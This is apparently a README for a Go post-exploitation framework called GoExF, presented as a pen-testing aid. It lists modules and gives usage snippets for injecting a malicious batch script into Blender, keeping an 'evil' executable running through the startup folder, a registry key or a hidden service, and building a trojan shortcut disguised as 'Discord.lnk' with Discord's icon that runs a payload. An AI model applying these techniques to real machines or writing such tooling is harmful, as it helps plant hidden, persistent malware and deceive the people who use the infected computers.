A Golang Post-Exploitation Framework

GoExF is a collection of Golang modules that can be used to aid penetration testers during all phases of an assessment. GoExF is comprised of the following modules and scripts:

Installation

git clone https://github.com/F-r-o-i-d/GoExF in your projet directories

• main.go
• go.mod
• go.sum
• GoExF
  • GoSploit
    • EvilFile
    • InfectApp
    • StartUp.go

main.go

package main

import (
	"<yourpackage>/GoExF/GoSploit" // ex 
)

func main() {
	GoSploit.Initialize()
}

🔴 -> need Admin 🟢 -> Admin not required ⚫ -> Visible to target ⚪ -> Invisible to target

CodeInjection

Execute code on a target machine.

<yourpackage>/GoExF/GoSploit/InfectApp

– InfectApp.InfectBlender( payload ) [🔴⚪]

Injects a malicious script (batch) in blender code

Persistance

Make evil program stuck on the target machine.

<yourpackage>/GoExF/GoSploit

– GoSploit.StartUpWdirectories()[🟢⚫]

copy evil .exe -> shell:startup

– GoSploit.StartUpWdregedit()[🔴⚫]

create key regedit to launch exe at startup

– GoSploit.StartUpWservice(ServiceName)[🔴⚪]

create a service to launch exe at startup

Trojan

Make evil file hiden to look like something good.

import EvilFile "<yourpackage>/GoExF/GoSploit/EvilFile"

– EvilFile.Lnk [🟢⚫]

Discord := EvilFile.Lnk{
	Name:        "Discord.lnk",
	Payload:     "evilCode",
	Path:        "$home\\Desktop\\",
	Interface:   "cmd.exe / powershell.exe",
	IconPath:    "Discord.exe path / Discord.ico path",
	Description: "Discord ShortCut",
}
Discord.Build()

GitHub

View Github